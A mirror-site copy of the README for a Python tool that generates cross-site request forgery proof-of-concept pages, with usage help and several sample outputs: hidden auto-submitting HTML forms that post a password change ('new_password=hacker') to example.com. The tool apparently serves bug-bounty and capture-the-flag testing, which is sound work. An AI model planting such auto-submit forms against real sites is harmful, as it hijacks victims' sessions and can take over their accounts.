Giter Site home page Giter Site logo

farid007 / csrf_poc_generator Goto Github PK

View Code? Open in Web Editor NEW
3.0 2.0 3.0 26 KB

This script generates PoC for Cross-site request forgery. you just need to provide Url, method and parameters

Python 100.00%
cross-site-request-forgery bugbounty bugbounty-tool ctf phising csrf csrf-poc csrf-poc-tool

csrf_poc_generator's Introduction

CSRF PoC Generator

This is a python script which generates PoC for Cross-site request forgery with autosubmit form. you just need to provide Url, method and parameters.

Required Package

python3 -m pip install yattag

Usage

Options

root@ghost:~# python3 csrf_poc_gen.py -h
usage: csrf_poc_gen.py [-h] [-m METHOD] [-u URL] [-p PARAMETERS] [-a AUTHOR]
                       [-e ENCTYPE]

This is a pyhton script which generates PoC for Cross-site request forgery
with autosubmit form. you just need to provide Url, method and parameters.

optional arguments:
  -h, --help            show this help message and exit
  -m METHOD, --method METHOD
                        Method
  -u URL, --url URL     url
  -p PARAMETERS, --parameters PARAMETERS
                        Request parameters
  -a AUTHOR, --author AUTHOR
                        Name of Author
  -e ENCTYPE, --enctype ENCTYPE
                        enctype

JSON Based CSRF PoC

Note: Some applications accept Json data when Content-type: text/plain.

root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p '{new_password: "hacker", re_password: "hacker", extra": =extra}' -e "text/plain"
<html>
  <title>
    This CSRF was found by 
  </title>
  <body>
    <h1>
      This POC was Created By CSRF PoC Generator Tool
    </h1>
    <form action="http://example.com" method="POST" enctype="text/plain">
      <input type="hidden" name="{new_password: %22hacker%22, re_password: %22hacker%22, extra%22: " value="extra}" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

To Generate PoC

Note: Parameters should be in the form of key value pair (key=value&key=value).

root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p "new_password=hacker&re_new_password=hacker" 
<html>
  <title>
    This CSRF was found by 
  </title>
  <body>
    <h1>
      This POC was Created By CSRF PoC Generator Tool
    </h1>
    <form action="http://example.com" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="new_password" value="hacker" />
      <input type="hidden" name="re_new_password" value="hacker" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

Enctype

it supports 3 enctype application/x-www-form-urlencoded, multipart/form-data and text/plain.

root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p "new_password=hacker&re_new_password=hacker" -e "text/plain"
<html>
  <title>
    This CSRF was found by 
  </title>
  <body>
    <h1>
      This POC was Created By CSRF PoC Generator Tool
    </h1>
    <form action="http://example.com" method="POST" enctype="text/plain">
      <input type="hidden" name="new_password" value="hacker" />
      <input type="hidden" name="re_new_password" value="hacker" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

With Discoverer Name

root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p "new_password=hacker&re_new_password=hacker" -a "Hacker man"
<html>
  <title>
    This CSRF was found by Hacker man
  </title>
  <body>
    <h1>
      This POC was Created By CSRF PoC Generator Tool
    </h1>
    <form action="http://example.com" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="new_password" value="hacker" />
      <input type="hidden" name="re_new_password" value="hacker" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

csrf_poc_generator's People

Contributors

farid007 avatar

Stargazers

avatar avatar avatar

Watchers

avatar avatar

Forkers

hexclass aishwaryar1997 conorxx1

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.